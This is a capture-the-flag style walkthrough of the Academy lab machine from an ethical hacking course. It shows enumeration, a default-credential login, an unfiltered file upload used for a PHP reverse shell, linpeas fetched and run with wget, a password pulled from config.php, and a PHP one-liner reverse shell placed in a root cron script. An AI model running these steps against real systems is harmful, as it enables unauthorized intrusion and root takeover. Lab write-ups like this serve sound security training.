Writeup — Academy | TCM Security | by dollarboysushil
Writeup of Academy machine from TCM Security under Capstone of Practical Ethical Hacking — The Complete Course

Link to img of machine : https://drive.google.com/file/d/1u4628J7AwEzFCS3gWZbJgv-lhGzwmrvf/view?usp=drive_link
Victim’s IP ;
IP may/will be different in your case
lets runs nmap to view the running ports in the machine.

nmap -sC -sV {IP} -oN nmap
here -sC
flag runs default script-sV
flag runs version detection
and -oN
is saving the result in nmap file
We have open ports:21
— vsftpd 3.0.322
— OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)80
— http Apache httpd 2.4.38 ((Debian))
Lets look into port 80 HTTP

We have a default apache website running on port 80. Nothing much here.
So next best idea is to brute force directories
hoping to find any juicy directory if exist.

gobuster dir -u {ip} -w {wordlist}
here flag -u
is used to set the url and -w
is used to set wordlist.
lets look at these directory.
inside /academy
we have a loginpage for student. I tried logging with some credentials like admin:root
and so on . but nothing worked. Same for /phpmyadmin
So the next best idea would be to again use gobsuter
to bruteforce directory under /academy

We found some interesting directories.
lets look at /admin

in /admin
we are prompted to login. I again used default credentials and this time admin:admin

After login we can see lots of interesting thing. Lets go to Manage student section

Here we have an option to reset password, so reset the password and lets go to login portal of student and try to login.
student login portal is at ip/academy
if you forgot.

after login, go to my profile section. Here we have an option to upload a photo.
I tried uploading .php
file to see if there is any sort of filter, but there wasnt any filter which means we can upload any file.
so using this vulnerability we can upload a php reverse shell
and setup netcat listner
so that when the uploaded php file is uploaded we get shell access.
For this download php reverse shell from here.
In the php-reverse-shell.php
we have to do some modification.

edit $ip
field to your ip.
and changing $port
field is optional. Remember the port you used.
Now save this php-reverse-shell.php
and upload.

Click on browse and upload the file. You must see Successfull message.
Now lets make netcat ready to listen.

Here use the same port you used in previous php-reverse-shell.php

After your netcat is ready.
right click on profile and click reload image.
This should make the website to stuck on infinitely loading.

Under netcat listener we have successful shell.
we are logged in as www-data
This user have no power , so our aim is to either escalate privilege to root, or pivot to next powerful user.
For this we will be using linpeas
which stands for Linux privilege escalation.
to install linpeas in victim machine, use cmd cd /tmp
to navigate to tmp
directory .

cmd wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
This should install linpeas.sh.

now use chmod +x linpeas.sh
to make linpeas executable. And run linpeas using command ./linpeas.sh
Wait until linpeas is done.
Looking at the result from the linpeas. There are mainly two items that are very interesting.

We can see intresting cronjob. The cron job * * * * * /home/backup.sh
means the script /home/backup.sh
will be executed every minute.
And second thing i found is

linpeas is showing password user /var/www/html/academy/includes/config.php
Lets look at this config.php

And we have username and password.
lets try to ssh login with this username and password.

And it worked, we are now logged in as grimmie.
For the backup.sh
file we found.
we can edit this file, inside this file we can add php one liner and setup the netcat to listen.
since this cronjob is executed every minute, we should get ourself a shell.

nano backup.sh
opens backup.sh file with nano editor

remove previous code and add php -r ‘$sock=fsockopen(“{yourip}”,1234);exec(“/bin/sh -i <&3 >&3 2>&3”);’
you can find one liner reverse shell from here :
No save and exit.
Lets make netcat listner ready.

make sure to use same port as you used in php one liner.
wait for a minute , backup.sh
file should run auto every minute

And we have root access.
Machine successfully rooted.
For any correction / query /suggestion contact on
Instagram dollarboysushil
Twitter (X) dollarboysushil
Youtube dollarboysushil
Here is note which i used while solve this lab.